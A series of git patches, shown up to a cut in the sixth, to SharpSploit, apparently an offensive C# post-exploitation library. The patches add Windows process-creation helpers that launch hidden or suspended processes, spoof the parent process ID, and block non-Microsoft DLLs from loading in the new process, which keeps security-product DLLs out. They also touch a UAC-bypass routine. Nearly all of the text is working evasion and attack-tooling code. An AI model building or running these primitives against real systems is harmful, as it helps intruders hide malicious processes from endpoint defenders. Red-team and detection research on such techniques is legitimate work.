From 3d7cdadd29c46cd04bda45f33e0600fb2d77dd50 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 23 Sep 2020 17:24:52 +0200 Subject: [PATCH 1/7] Add createProcess, CreateProcessPInvoke, CreateProcessPInvokePPID --- SharpSploit/Credentials/Tokens.cs | 5 +- SharpSploit/Execution/PlatformInvoke/Win32.cs | 46 ++++++++- SharpSploit/Execution/Shell.cs | 98 +++++++++++++++++++ SharpSploit/Execution/Win32.cs | 6 +- 4 files changed, 149 insertions(+), 6 deletions(-) diff --git a/SharpSploit/Credentials/Tokens.cs b/SharpSploit/Credentials/Tokens.cs index 48b12dd..e41019a 100644 --- a/SharpSploit/Credentials/Tokens.cs +++ b/SharpSploit/Credentials/Tokens.cs @@ -248,11 +248,14 @@ public bool BypassUAC(string Binary = "cmd.exe", string Arguments = "", string P continue; } + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE; + + Win32.ProcessThreadsAPI._STARTUPINFO startupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); startupInfo.cb = (UInt32)Marshal.SizeOf(typeof(Win32.ProcessThreadsAPI._STARTUPINFO)); Win32.ProcessThreadsAPI._PROCESS_INFORMATION processInformation = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); if (!PInvoke.Win32.Advapi32.CreateProcessWithLogonW(Environment.UserName, Environment.UserDomainName, "password", - 0x00000002, Path + Binary, Path + Binary + " " + Arguments, 0x04000000, IntPtr.Zero, Path, ref startupInfo, out processInformation)) + 0x00000002, Path + Binary, Path + Binary + " " + Arguments, flags, IntPtr.Zero, Path, ref startupInfo, out processInformation)) { Console.Error.WriteLine("CreateProcessWithLogonW() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message); continue; diff --git a/SharpSploit/Execution/PlatformInvoke/Win32.cs b/SharpSploit/Execution/PlatformInvoke/Win32.cs index 78501c8..47e3347 100644 --- a/SharpSploit/Execution/PlatformInvoke/Win32.cs +++ b/SharpSploit/Execution/PlatformInvoke/Win32.cs @@ -177,6 +177,32 @@ IntPtr hProcess public static extern void GetNativeSystemInfo( ref Execute.Win32.Kernel32.SYSTEM_INFO lpSystemInfo ); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool InitializeProcThreadAttributeList( + IntPtr lpAttributeList, + int dwAttributeCount, + int dwFlags, + ref IntPtr lpSize + ); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool UpdateProcThreadAttribute( + IntPtr lpAttributeList, + uint dwFlags, + IntPtr Attribute, + IntPtr lpValue, + IntPtr cbSize, + IntPtr lpPreviousValue, + IntPtr lpReturnSize + ); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool DeleteProcThreadAttributeList( + IntPtr lpAttributeList + ); + + } public static class User32 @@ -368,7 +394,7 @@ public static extern bool CreateProcessWithLogonW( int logonFlags, String applicationName, String commandLine, - int creationFlags, + Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, IntPtr environment, String currentDirectory, ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO startupInfo, @@ -387,6 +413,22 @@ public static extern bool CreateProcessWithTokenW( ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO lpStartupInfo, out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInfo ); + + + [DllImport("kernel32.dll")] + public static extern bool CreateProcess( + string lpApplicationName, + string lpCommandLine, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpProcessAttributes, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpThreadAttributes, + bool bInheritHandles, + Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, + IntPtr lpEnvironment, + string lpCurrentDirectory, + ref Execute.Win32.ProcessThreadsAPI._STARTUPINFOEX lpStartupInfoEx, + out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInformation + ); + [DllImport("advapi32.dll", SetLastError = true)] public static extern Boolean CredEnumerateW( @@ -531,7 +573,7 @@ public static extern Int32 RegQueryInfoKey( IntPtr lpSecurityDescriptor, IntPtr lpftLastWriteTime ); - + [DllImport("advapi32.dll", SetLastError = true)] public static extern Boolean RevertToSelf(); diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index b443d63..4c24f53 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -296,5 +296,103 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr } } } + + + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess) + { + + Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + + StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); + IntPtr lpValue = IntPtr.Zero; + Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + pSec.nLength = (uint)Marshal.SizeOf(pSec); + tSec.nLength = (uint)Marshal.SizeOf(tSec); + + StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; + + PInvoke.Win32.Advapi32.CreateProcess( + targetProcess, + null, + ref pSec, + ref tSec, + false, + flags, + IntPtr.Zero, + null, + ref StartupInfoEx, + out ProcInfo + ); + + return ProcInfo; + } + + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId) + { + + const int ProcThreadAttributeParentProcess = 0x00020000; + + Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + + StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); + IntPtr lpValue = IntPtr.Zero; + + try + { + + Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + pSec.nLength = (uint)Marshal.SizeOf(pSec); + tSec.nLength = (uint)Marshal.SizeOf(tSec); + + StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; + + IntPtr lpSize = IntPtr.Zero; + + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); + + IntPtr parentHandle = Process.GetProcessById(parentProcessId).Handle; + lpValue = Marshal.AllocHGlobal(IntPtr.Size); + Marshal.WriteIntPtr(lpValue, parentHandle); + + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)ProcThreadAttributeParentProcess, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + PInvoke.Win32.Advapi32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); + + return ProcInfo; + + } + finally + { + PInvoke.Win32.Kernel32.DeleteProcThreadAttributeList(StartupInfoEx.lpAttributeList); + Marshal.FreeHGlobal(StartupInfoEx.lpAttributeList); + Marshal.FreeHGlobal(lpValue); + } + } + + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION createProcessAsPInvoke(string path, string domain, string username, string password) + { + const int LogonWithProfile = 0x00000001; + + Win32.ProcessThreadsAPI._STARTUPINFO StartupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + + StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED | Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; + + PInvoke.Win32.Advapi32.CreateProcessWithLogonW(username, domain, password, LogonWithProfile, path, "", flags, IntPtr.Zero, @"C:\Windows\System32", ref StartupInfo, out ProcInfo); + return ProcInfo; + } + + } } \ No newline at end of file diff --git a/SharpSploit/Execution/Win32.cs b/SharpSploit/Execution/Win32.cs index 8806a43..69f61c2 100644 --- a/SharpSploit/Execution/Win32.cs +++ b/SharpSploit/Execution/Win32.cs @@ -542,7 +542,7 @@ public struct _SYSTEM_INFO [StructLayout(LayoutKind.Sequential)] public struct _SECURITY_ATTRIBUTES { - UInt32 nLength; + public UInt32 nLength; IntPtr lpSecurityDescriptor; Boolean bInheritHandle; }; @@ -868,8 +868,8 @@ public struct _STARTUPINFO [StructLayout(LayoutKind.Sequential)] public struct _STARTUPINFOEX { - _STARTUPINFO StartupInfo; - // PPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; + public _STARTUPINFO StartupInfo; + public IntPtr lpAttributeList; }; //https://msdn.microsoft.com/en-us/library/windows/desktop/ms684873(v=vs.85).aspx From 9eb579451c63ab4e13a7df21d983f7d201cc223a Mon Sep 17 00:00:00 2001 From: salu90 Date: Thu, 24 Sep 2020 11:09:07 +0200 Subject: [PATCH 2/7] minor fixes --- SharpSploit/Credentials/Tokens.cs | 7 +-- SharpSploit/Execution/PlatformInvoke/Win32.cs | 33 ++++++------- SharpSploit/Execution/Shell.cs | 47 ++++++++++--------- 3 files changed, 41 insertions(+), 46 deletions(-) diff --git a/SharpSploit/Credentials/Tokens.cs b/SharpSploit/Credentials/Tokens.cs index e41019a..0cd195a 100644 --- a/SharpSploit/Credentials/Tokens.cs +++ b/SharpSploit/Credentials/Tokens.cs @@ -248,14 +248,11 @@ public bool BypassUAC(string Binary = "cmd.exe", string Arguments = "", string P continue; } - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE; - - Win32.ProcessThreadsAPI._STARTUPINFO startupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); startupInfo.cb = (UInt32)Marshal.SizeOf(typeof(Win32.ProcessThreadsAPI._STARTUPINFO)); Win32.ProcessThreadsAPI._PROCESS_INFORMATION processInformation = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); if (!PInvoke.Win32.Advapi32.CreateProcessWithLogonW(Environment.UserName, Environment.UserDomainName, "password", - 0x00000002, Path + Binary, Path + Binary + " " + Arguments, flags, IntPtr.Zero, Path, ref startupInfo, out processInformation)) + 0x00000002, Path + Binary, Path + Binary + " " + Arguments, 0x04000000, IntPtr.Zero, Path, ref startupInfo, out processInformation)) { Console.Error.WriteLine("CreateProcessWithLogonW() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message); continue; @@ -657,4 +654,4 @@ public static string ConvertSidToName(IntPtr pSid) } } } -} +} \ No newline at end of file diff --git a/SharpSploit/Execution/PlatformInvoke/Win32.cs b/SharpSploit/Execution/PlatformInvoke/Win32.cs index 47e3347..5f08ec5 100644 --- a/SharpSploit/Execution/PlatformInvoke/Win32.cs +++ b/SharpSploit/Execution/PlatformInvoke/Win32.cs @@ -202,6 +202,19 @@ public static extern bool DeleteProcThreadAttributeList( IntPtr lpAttributeList ); + [DllImport("kernel32.dll")] + public static extern bool CreateProcess( + string lpApplicationName, + string lpCommandLine, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpProcessAttributes, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpThreadAttributes, + bool bInheritHandles, + Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, + IntPtr lpEnvironment, + string lpCurrentDirectory, + ref Execute.Win32.ProcessThreadsAPI._STARTUPINFOEX lpStartupInfoEx, + out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInformation + ); } @@ -394,7 +407,7 @@ public static extern bool CreateProcessWithLogonW( int logonFlags, String applicationName, String commandLine, - Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, + int creationFlags, IntPtr environment, String currentDirectory, ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO startupInfo, @@ -413,23 +426,7 @@ public static extern bool CreateProcessWithTokenW( ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO lpStartupInfo, out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInfo ); - - - [DllImport("kernel32.dll")] - public static extern bool CreateProcess( - string lpApplicationName, - string lpCommandLine, - ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpProcessAttributes, - ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpThreadAttributes, - bool bInheritHandles, - Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, - IntPtr lpEnvironment, - string lpCurrentDirectory, - ref Execute.Win32.ProcessThreadsAPI._STARTUPINFOEX lpStartupInfoEx, - out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInformation - ); - - + [DllImport("advapi32.dll", SetLastError = true)] public static extern Boolean CredEnumerateW( String Filter, diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index 4c24f53..a345b3d 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -296,8 +296,17 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr } } } - - + + + /// + /// Creates a process specified as argument using the Platform Invoke API. + /// + /// Simone Salucci (@saim1z) & Daniel López (@attl4s) + /// The target process to execute. + /// PROCESS_INFORMATION structure. + /// + /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). + /// public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess) { @@ -315,7 +324,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke( StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; - PInvoke.Win32.Advapi32.CreateProcess( + PInvoke.Win32.Kernel32.CreateProcess( targetProcess, null, ref pSec, @@ -331,6 +340,16 @@ out ProcInfo return ProcInfo; } + /// + /// Creates a process with the parent process ID specified as argument using the Platform Invoke API. + /// + /// Simone Salucci (@saim1z) & Daniel López (@attl4s) + /// The target process to execute. + /// The parent process ID of the new process executed. + /// PROCESS_INFORMATION structure. + /// + /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). + /// public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId) { @@ -355,7 +374,6 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; IntPtr lpSize = IntPtr.Zero; - PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); @@ -365,10 +383,9 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Marshal.WriteIntPtr(lpValue, parentHandle); PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)ProcThreadAttributeParentProcess, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); - PInvoke.Win32.Advapi32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); + PInvoke.Win32.Kernel32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); return ProcInfo; - } finally { @@ -377,22 +394,6 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Marshal.FreeHGlobal(lpValue); } } - - public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION createProcessAsPInvoke(string path, string domain, string username, string password) - { - const int LogonWithProfile = 0x00000001; - - Win32.ProcessThreadsAPI._STARTUPINFO StartupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); - Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; - - StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; - StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED | Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; - - PInvoke.Win32.Advapi32.CreateProcessWithLogonW(username, domain, password, LogonWithProfile, path, "", flags, IntPtr.Zero, @"C:\Windows\System32", ref StartupInfo, out ProcInfo); - return ProcInfo; - } - - + } } \ No newline at end of file From c0ba031fbbeb45defe43e4441049a521f78e50be Mon Sep 17 00:00:00 2001 From: salu90 Date: Thu, 24 Sep 2020 11:27:56 +0200 Subject: [PATCH 3/7] update Tokens.cs --- SharpSploit/Credentials/Tokens.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SharpSploit/Credentials/Tokens.cs b/SharpSploit/Credentials/Tokens.cs index 0cd195a..48b12dd 100644 --- a/SharpSploit/Credentials/Tokens.cs +++ b/SharpSploit/Credentials/Tokens.cs @@ -654,4 +654,4 @@ public static string ConvertSidToName(IntPtr pSid) } } } -} \ No newline at end of file +} From 03716a8abcf9313d260182e3809620c1e512e72d Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 15:35:51 +0200 Subject: [PATCH 4/7] Add BlockDLL feature to CreateProcessPInvokePPID and CreateProcessPInvoke --- SharpSploit/Execution/Shell.cs | 44 +++++++++++++++++++++------------- SharpSploit/Execution/Win32.cs | 15 ++++++++++++ 2 files changed, 43 insertions(+), 16 deletions(-) diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index a345b3d..b58f182 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -297,7 +297,6 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr } } - /// /// Creates a process specified as argument using the Platform Invoke API. /// @@ -307,14 +306,14 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr /// /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). /// - public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess) + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess, bool blockDLL) { - Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); - Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); - IntPtr lpValue = IntPtr.Zero; + IntPtr lpValue = Marshal.AllocHGlobal(IntPtr.Size); + Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); pSec.nLength = (uint)Marshal.SizeOf(pSec); @@ -322,9 +321,19 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke( StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; - PInvoke.Win32.Kernel32.CreateProcess( + if (blockDLL) + { + IntPtr lpSize = IntPtr.Zero; + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + } + + PInvoke.Win32.Kernel32.CreateProcess( targetProcess, null, ref pSec, @@ -350,20 +359,17 @@ out ProcInfo /// /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). /// - public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId) + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId, bool blockDLL) { - const int ProcThreadAttributeParentProcess = 0x00020000; - Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); - Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); - IntPtr lpValue = IntPtr.Zero; + IntPtr lpValue = Marshal.AllocHGlobal(IntPtr.Size); try { - Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); pSec.nLength = (uint)Marshal.SizeOf(pSec); @@ -374,15 +380,21 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; IntPtr lpSize = IntPtr.Zero; - PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); - PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 2, 0, ref lpSize); + + if (blockDLL) + { + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + } IntPtr parentHandle = Process.GetProcessById(parentProcessId).Handle; lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, parentHandle); - PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)ProcThreadAttributeParentProcess, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); PInvoke.Win32.Kernel32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); return ProcInfo; diff --git a/SharpSploit/Execution/Win32.cs b/SharpSploit/Execution/Win32.cs index 69f61c2..7d80b44 100644 --- a/SharpSploit/Execution/Win32.cs +++ b/SharpSploit/Execution/Win32.cs @@ -489,6 +489,21 @@ public enum SERVICE_ERROR SERVICE_ERROR_SEVERE = 0x00000002, SERVICE_ERROR_CRITICAL = 0x00000003, } + + [Flags] + public enum BINARY_SIGNATURE_POLICY : ulong + { + BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000, + BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000 + } + + [Flags] + public enum PROCESS_THREAD_ATTRIBUTE : int + { + MITIGATION_POLICY = 0x20007, + PARENT_PROCESS = 0x00020000 + } + } public static class Dbghelp From 4d891a01775f20cf6889aafd27dd7674a21316d8 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 16:22:15 +0200 Subject: [PATCH 5/7] Update Shell.cs --- SharpSploit/Execution/Shell.cs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index b58f182..b6fd22f 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -386,7 +386,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP if (blockDLL) { - Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); } @@ -408,4 +408,4 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP } } -} \ No newline at end of file +} From 58ab77a7b3bf03009b59a4cb4d547ebcd5dd19a9 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 22:40:07 +0200 Subject: [PATCH 6/7] Modify CreateProcessPInvokePPID and CreateProcessPInvoke --- SharpSploit/Execution/Shell.cs | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index b58f182..08d6136 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -321,7 +321,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke( StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT | Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED; if (blockDLL) { @@ -375,9 +375,9 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP pSec.nLength = 